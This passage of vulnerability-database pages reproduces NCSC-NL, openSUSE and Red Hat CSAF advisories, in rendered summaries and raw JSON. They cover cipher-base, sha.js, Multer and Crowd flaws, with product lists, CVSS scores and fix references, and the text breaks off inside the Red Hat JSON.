            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-9287"
    },
    {
      "cve": "CVE-2025-9288",
      "cwe": {
        "id": "CWE-20",
        "name": "Improper Input Validation"
      },
      "notes": [
        {
          "category": "other",
          "text": "Improper Input Validation",
          "title": "CWE-20"
        },
        {
          "category": "description",
          "text": "The document outlines a vulnerability in `sha.js` versions up to 2.4.11 due to insufficient input type checks, leading to potential denial of service and private key extraction risks.",
          "title": "Summary"
        },
        {
          "category": "general",
          "text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "title": "CVSSV4"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2025-9288 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-9288.json"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "CSAFPID-1",
            "CSAFPID-2",
            "CSAFPID-3",
            "CSAFPID-4",
            "CSAFPID-5",
            "CSAFPID-6",
            "CSAFPID-7"
          ]
        }
      ],
      "title": "CVE-2025-9288"
    },
    {
      "cve": "CVE-2026-21569",
      "notes": [
        {
          "category": "description",
          "text": "A high severity XXE vulnerability in Crowd Data Center and Server version 7.1.0 has a CVSS score of 7.9, allowing authenticated attackers to access sensitive content without user interaction.",
          "title": "Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-1",
          "CSAFPID-2",
          "CSAFPID-3",
          "CSAFPID-4",
          "CSAFPID-5",
          "CSAFPID-6",
          "CSAFPID-7"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "CVE-2026-21569 | NCSC-NL Website",
          "url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-21569.json"
        }
      ],
      "title": "CVE-2026-21569"
    }
  ]
}

OPENSUSE-SU-2025:15484-1

Vulnerability from csaf_opensuse - Published: 2025-08-22 00:00 - Updated: 2025-08-22 00:00

Summary

jupyter-bqplot-jupyterlab-0.5.46-12.1 on GA media

Severity

Moderate

Notes

Title of the patch: jupyter-bqplot-jupyterlab-0.5.46-12.1 on GA media

Description of the patch: These are all security issues fixed in the jupyter-bqplot-jupyterlab-0.5.46-12.1 package on the GA media of openSUSE Tumbleweed.

Patchnames: openSUSE-Tumbleweed-2025-15484

CVE-2025-9287

9 (Critical)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Affected products

Recommended 12 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.x86_64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.x86_64	—	Vendor Fix

Threats

Impact critical

References

5 references

URL	Category
https://www.suse.com/support/security/rating/	external
https://ftp.suse.com/pub/projects/security/csaf/o…	self
https://www.suse.com/security/cve/CVE-2025-9287/	self
https://www.suse.com/security/cve/CVE-2025-9287	external
https://bugzilla.suse.com/1248429	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "jupyter-bqplot-jupyterlab-0.5.46-12.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the jupyter-bqplot-jupyterlab-0.5.46-12.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2025-15484",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15484-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-9287 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-9287/"
      }
    ],
    "title": "jupyter-bqplot-jupyterlab-0.5.46-12.1 on GA media",
    "tracking": {
      "current_release_date": "2025-08-22T00:00:00Z",
      "generator": {
        "date": "2025-08-22T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2025:15484-1",
      "initial_release_date": "2025-08-22T00:00:00Z",
      "revision_history": [
        {
          "date": "2025-08-22T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64",
                "product": {
                  "name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64",
                  "product_id": "jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "jupyter-bqplot-notebook-0.5.46-12.1.aarch64",
                "product": {
                  "name": "jupyter-bqplot-notebook-0.5.46-12.1.aarch64",
                  "product_id": "jupyter-bqplot-notebook-0.5.46-12.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "python311-bqplot-0.12.45-12.1.aarch64",
                "product": {
                  "name": "python311-bqplot-0.12.45-12.1.aarch64",
                  "product_id": "python311-bqplot-0.12.45-12.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le",
                "product": {
                  "name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le",
                  "product_id": "jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "jupyter-bqplot-notebook-0.5.46-12.1.ppc64le",
                "product": {
                  "name": "jupyter-bqplot-notebook-0.5.46-12.1.ppc64le",
                  "product_id": "jupyter-bqplot-notebook-0.5.46-12.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "python311-bqplot-0.12.45-12.1.ppc64le",
                "product": {
                  "name": "python311-bqplot-0.12.45-12.1.ppc64le",
                  "product_id": "python311-bqplot-0.12.45-12.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x",
                "product": {
                  "name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x",
                  "product_id": "jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "jupyter-bqplot-notebook-0.5.46-12.1.s390x",
                "product": {
                  "name": "jupyter-bqplot-notebook-0.5.46-12.1.s390x",
                  "product_id": "jupyter-bqplot-notebook-0.5.46-12.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python311-bqplot-0.12.45-12.1.s390x",
                "product": {
                  "name": "python311-bqplot-0.12.45-12.1.s390x",
                  "product_id": "python311-bqplot-0.12.45-12.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64",
                "product": {
                  "name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64",
                  "product_id": "jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "jupyter-bqplot-notebook-0.5.46-12.1.x86_64",
                "product": {
                  "name": "jupyter-bqplot-notebook-0.5.46-12.1.x86_64",
                  "product_id": "jupyter-bqplot-notebook-0.5.46-12.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python311-bqplot-0.12.45-12.1.x86_64",
                "product": {
                  "name": "python311-bqplot-0.12.45-12.1.x86_64",
                  "product_id": "python311-bqplot-0.12.45-12.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64"
        },
        "product_reference": "jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le"
        },
        "product_reference": "jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x"
        },
        "product_reference": "jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64"
        },
        "product_reference": "jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "jupyter-bqplot-notebook-0.5.46-12.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.aarch64"
        },
        "product_reference": "jupyter-bqplot-notebook-0.5.46-12.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "jupyter-bqplot-notebook-0.5.46-12.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.ppc64le"
        },
        "product_reference": "jupyter-bqplot-notebook-0.5.46-12.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "jupyter-bqplot-notebook-0.5.46-12.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.s390x"
        },
        "product_reference": "jupyter-bqplot-notebook-0.5.46-12.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "jupyter-bqplot-notebook-0.5.46-12.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.x86_64"
        },
        "product_reference": "jupyter-bqplot-notebook-0.5.46-12.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-bqplot-0.12.45-12.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.aarch64"
        },
        "product_reference": "python311-bqplot-0.12.45-12.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-bqplot-0.12.45-12.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.ppc64le"
        },
        "product_reference": "python311-bqplot-0.12.45-12.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-bqplot-0.12.45-12.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.s390x"
        },
        "product_reference": "python311-bqplot-0.12.45-12.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-bqplot-0.12.45-12.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.x86_64"
        },
        "product_reference": "python311-bqplot-0.12.45-12.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-9287",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-9287"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64",
          "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le",
          "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x",
          "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64",
          "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.aarch64",
          "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.ppc64le",
          "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.s390x",
          "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.x86_64",
          "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.aarch64",
          "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.ppc64le",
          "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.s390x",
          "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-9287",
          "url": "https://www.suse.com/security/cve/CVE-2025-9287"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1248429 for CVE-2025-9287",
          "url": "https://bugzilla.suse.com/1248429"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64",
            "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le",
            "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x",
            "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64",
            "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.aarch64",
            "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.ppc64le",
            "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.s390x",
            "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.x86_64",
            "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.aarch64",
            "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.ppc64le",
            "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.s390x",
            "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 9,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64",
            "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le",
            "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x",
            "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64",
            "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.aarch64",
            "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.ppc64le",
            "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.s390x",
            "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.x86_64",
            "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.aarch64",
            "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.ppc64le",
            "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.s390x",
            "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-08-22T00:00:00Z",
          "details": "critical"
        }
      ],
      "title": "CVE-2025-9287"
    }
  ]
}

RHSA-2025:14767

Vulnerability from csaf_redhat - Published: 2025-08-27 15:50 - Updated: 2026-03-25 00:37

Summary

Red Hat Security Advisory: Red Hat Developer Hub 1.6.4 release.

Severity

Important

Notes

Topic: Red Hat Developer Hub 1.6.4 has been released.

Details: Red Hat Developer Hub (RHDH) is Red Hat's enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.

Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

CVE-2025-7338

A denial of service vulnerability was found in the Multer NPM library. This vulnerability allows an attacker to trigger a denial of service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, resulting in a process crash.

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE-248 - Uncaught Exception

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64		—	Workaround

Threats

Impact Moderate

CVE-2025-9287

An improper input validation vulnerability was found in the cipher-base npm package. Missing input type checks in the polyfill of the Node.js `createHash` function result in invalid value calculations, hanging and rewinding the hash state, including turning a tagged hash into an untagged hash, for malicious JSON-stringifyable inputs.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L

CWE-20 - Improper Input Validation

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64		—	Workaround

Threats

Impact Important

CVE-2025-9288

A vulnerability was found in sha.js, where the hashing implementation does not perform sufficient input type validation. The .update() function accepts arbitrary objects, including those with crafted length properties, which can alter the internal state machine of the hashing process. This flaw may result in unexpected behavior such as rewinding the hash state, producing inconsistent digest outputs, or entering invalid processing loops. The issue was introduced due to the reliance on JavaScript object coercion rules rather than enforcing strict buffer or string inputs.

7.7 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H

CWE-20 - Improper Input Validation

Affected products

Fixed 1 product

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:48b72d96926999336505cbf097f873dd9ccb2dec814a5db7f7ffa630dea29dc5_amd64		—	Vendor Fix fix Workaround

Known not affected 2 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:7de394929c58edb75ef46b277a25322f77f098919208eca5694c927c38c5af26_amd64		—	Workaround
Unresolved product id: Red Hat Developer Hub 1.6:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:555e8b3628e6f2bad033545016f774a7bf5f01d038a2c4696982067964a56cb8_amd64		—	Workaround

Threats

Impact Important

References

31 references

URL	Category
https://access.redhat.com/errata/RHSA-2025:14767	self
https://access.redhat.com/security/cve/CVE-2025-7338	external
https://access.redhat.com/security/cve/CVE-2025-9287	external
https://access.redhat.com/security/cve/CVE-2025-9288	external
https://access.redhat.com/security/updates/classi…	external
https://catalog.redhat.com/search?gs&searchType=c…	external
https://developers.redhat.com/rhdh/overview	external
https://docs.redhat.com/en/documentation/red_hat_…	external
https://issues.redhat.com/browse/RHIDP-8263	external
https://issues.redhat.com/browse/RHIDP-8678	external
https://issues.redhat.com/browse/RHIDP-8684	external
https://security.access.redhat.com/data/csaf/v2/a…	self
https://access.redhat.com/security/cve/CVE-2025-7338	self
https://bugzilla.redhat.com/show_bug.cgi?id=2381726	external
https://www.cve.org/CVERecord?id=CVE-2025-7338	external
https://nvd.nist.gov/vuln/detail/CVE-2025-7338	external
https://cna.openjsf.org/security-advisories.html	external
https://github.com/expressjs/multer/commit/adfeaf…	external
https://github.com/expressjs/multer/security/advi…	external
https://access.redhat.com/security/cve/CVE-2025-9287	self
https://bugzilla.redhat.com/show_bug.cgi?id=2389932	external
https://www.cve.org/CVERecord?id=CVE-2025-9287	external
https://nvd.nist.gov/vuln/detail/CVE-2025-9287	external
https://github.com/browserify/cipher-base/pull/23	external
https://github.com/browserify/cipher-base/securit…	external
https://access.redhat.com/security/cve/CVE-2025-9288	self
https://bugzilla.redhat.com/show_bug.cgi?id=2389980	external
https://www.cve.org/CVERecord?id=CVE-2025-9288	external
https://nvd.nist.gov/vuln/detail/CVE-2025-9288	external
https://github.com/browserify/sha.js/pull/78	external
https://github.com/browserify/sha.js/security/adv…	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://access.redhat.com/security/updates/classification/",
      "text": "Important"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Red Hat Developer Hub 1.6.4 has been released.",
        "title": "Topic"
      },
      {
        "category": "general",
        "text": "Red Hat Developer Hub (RHDH) is Red Hat\u0027s enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.",
        "title": "Details"
      },
      {
        "category": "legal_disclaimer",
        "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
        "title": "Terms of Use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://access.redhat.com/security/team/contact/",
      "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
      "name": "Red Hat Product Security",
      "namespace": "https://www.redhat.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "https://access.redhat.com/errata/RHSA-2025:14767",
        "url": "https://access.redhat.com/errata/RHSA-2025:14767"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-7338",
        "url": "https://access.redhat.com/security/cve/CVE-2025-7338"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-9287",
        "url": "https://access.redhat.com/security/cve/CVE-2025-9287"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-9288",
        "url": "https://access.redhat.com/security/cve/CVE-2025-9288"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/updates/classification/",
        "url": "https://access.redhat.com/security/updates/classification/"
      },
      {
        "category": "external",
        "summary": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh",
        "url": "https://catalog.redhat.com/search?gs\u0026searchType=containers\u0026q=rhdh"
      },
      {
        "category": "external",
        "summary": "https://developers.redhat.com/rhdh/overview",
        "url": "https://developers.redhat.com/rhdh/overview"
      },
      {
        "category": "external",
        "summary": "https://docs.redhat.com/en/documentation/red_hat_developer_hub",
        "url": "https://docs.redhat.com/en/documentation/red_hat_developer_hub"
      },
      {
        "category": "external",
        "summary": "https://issues.redhat.com/browse/RHIDP-8263",
        "url": "https://issues.redhat.com/browse/RHIDP-8263"
      },
      {
        "category": "external",
        "summary": "https://issues.redhat.com/browse/RHIDP-8678",
        "url": "https://issues.redhat.com/browse/RHIDP-8678"
      },
      {
        "category": "external",
        "summary": "https://issues.redhat.com/browse/RHIDP-8684",
        "url": "https://issues.redhat.com/browse/RHIDP-8684"
      },
      {
        "category": "self",
        "summary": "Canonical URL",
        "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_14767.json"
      }
    ],
    "title": "Red Hat Security Advisory: Red Hat Developer Hub 1.6.4 release.",
    "tracking": {
      "current_release_date": "2026-03-25T00:37:01+00:00",
      "generator": {
        "date": "2026-03-25T00:37:01+00:00",
        "engine": {
          "name": "Red Hat SDEngine",
          "version": "4.7.3"
        }
      },
